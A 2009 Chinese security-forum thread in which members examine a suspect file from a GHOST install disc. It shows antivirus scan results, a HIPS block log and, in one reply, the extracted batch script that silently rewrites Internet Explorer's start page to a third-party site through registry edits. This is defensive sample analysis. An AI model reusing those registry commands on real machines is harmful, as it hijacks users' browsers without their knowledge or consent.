收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 GHOST 裝機盤的一個
12下一页
返回列表 发新帖
查看: 4340|回复: 16
收起左侧

[病毒样本] GHOST 裝機盤的一個

[复制链接]
英仔
发表于 2009-6-11 23:25:27 | 显示全部楼层 |阅读模式
a-squared4.5.0.1200906071955272009-06-07HackTool.Win32.Jakuz!IK
2.045
AntiVir8.2.0.1877.1.4.842009-06-11-
0.461
Arcavir20092009061106092009-06-11-
0.716
Authentium5.1.12009061001112009-06-10W32/Dropper.EUQ (Exact)
1.114
AVAST!4.7.4090610-02009-06-10-
0.011
AVG8.5.286270.12.63/21692009-06-11-
3.674
BitDefender7.81008.33477977.259212009-06-11-
3.109
CA (VET)9.0.0.14331.6.6553 2009-06-11Win32/Sipay.AB trojan.
3.438
ClamAV0.95.194542009-06-11Trojan.Agent-98414
0.012
Comodo3.913142009-06-11TrojWare.Win32.Trojan.Agent.~AABR
0.743
CP Secure1.1.0.7152009.06.112009-06-11-
10.068
Dr.Web4.44.0.91702009.06.112009-06-11-
4.710
F-Prot4.4.4.56200906092009-06-09W32/Dropper.EUQ (exact)
1.152
F-Secure5.51.61002009.06.11.122009-06-11-
0.248
GData19.5763/19.360200906112009-06-11-
5.027
IkarusT3.1.01.592009.06.11.728502009-06-11HackTool.Win32.Jakuz
3.319
Microsoft1.47012009.06.112009-06-11-
4.632
mks_vir2.012009.06.102009-06-10-
3.219
Norman6.01.096.01.002009-06-10-
4.007
nProtect20090611.0142337722009-06-11-
5.821
Quick Heal10.002009.06.112009-06-11-
1.215
Sophos2.87.14.422009-06-11-
2.442
Sunbelt518051802009-06-10-
1.014
The Hacker6.3.4.3v003432009-06-10-
0.721
VBA323.12.10.720090610.14352009-06-10-
1.955
ViRobot200906112009.06.112009-06-11-
0.424
VirusBuster4.5.11.1010.107.10/16092552009-06-11-
2.123
卡巴斯基5.5.102009.06.112009-06-11-
0.146
安博士V32009.06.11.022009.06.112009-06-11VBS/Downloader.57856
0.930
安天2.0.1820090611.25265052009-06-11-
0.121
江民杀毒11.0.7062009.06.112009-06-11-
2.849
熊猫卫士9.05.012009.06.102009-06-10-
2.109
瑞星20.021.33.32.002009-06-11-
1.333
赛门铁克1.3.0.2420090610.0022009-06-10-
0.123
趋势科技8.700-10046.190.022009-06-11TROJ_DLOADER.OZ
0.055
迈克菲5.3.0056422009-06-10-
3.120
金山毒霸2009.2.5.152009.6.11.182009-06-11-
0.597
飞塔2.81-3.11710.4872009-06-11W32/Agent.EUQ!tr
0.286
是毒嗎?
在GHOST 裝機盤裏

[ 本帖最后由 英仔 于 2009-6-11 23:32 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

dreams521
发表于 2009-6-11 23:27:01 | 显示全部楼层
mpav miss

[ 本帖最后由 dreams521 于 2009-6-11 23:34 编辑 ]
回复

举报

sam.to
发表于 2009-6-11 23:28:45 | 显示全部楼层
Sample please
回复

举报

英仔
 楼主| 发表于 2009-6-11 23:32:48 | 显示全部楼层

回复 2楼 dreams521 的帖子

忘了上傳,哈哈
回复

举报

xyao
发表于 2009-6-11 23:38:35 | 显示全部楼层
修改主页
@rem ----- ExeScript Options Begin -----
@rem ScriptType: console,silent
@rem DestDirectory: temp
@rem Icon: D:\Program Files\ExeScript\regedit.ico
@rem OutputFile: C:\Documents and Settings\Administrator\桌面\regedit.exe
@rem ----- ExeScript Options End -----
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d www.5599.net/?15 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d www.5599.net/?15 /f
reg add "HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /ve /t reg_sz /d "C:\Program Files\Internet Explorer\iexplore.exe www.5599.net/?15" /f

评分

参与人数 1人气 +1 收起 理由
dreams521 + 1 感谢解答: )

查看全部评分

回复

举报

英仔
 楼主| 发表于 2009-6-11 23:41:57 | 显示全部楼层
樓上的是用什麼工具看的
回复

举报

左手
发表于 2009-6-11 23:45:52 | 显示全部楼层
2009-06-11 23:45:29    创建文件      操作:阻止并结束进程
进程路径:E:\virus\regedit32.exe
文件路径:C:\Documents and Settings\cc\Local Settings\Temp\1.bat
触发规则:所有程序规则->FD:01…系统文件组->%SystemDrive%\*.bat


2009-06-11 23:45:29    创建文件      操作:阻止并结束进程
进程路径:E:\virus\regedit32.exe
文件路径:C:\Documents and Settings\ cc\Local Settings\Temp\1.bat
触发规则:所有程序规则->FD:01…系统文件组->%SystemDrive%\*.bat
回复

举报

xyao
发表于 2009-6-11 23:46:55 | 显示全部楼层
原帖由 英仔 于 2009-6-11 23:41 发表
樓上的是用什麼工具看的


运行后生成的BAT文件里的内容
回复

举报

英仔
 楼主| 发表于 2009-6-11 23:47:54 | 显示全部楼层
謝了、
回复

举报

yulhun
发表于 2009-6-11 23:55:15 | 显示全部楼层
miss  nod
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-11-17 09:25 , Processed in 1.507370 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表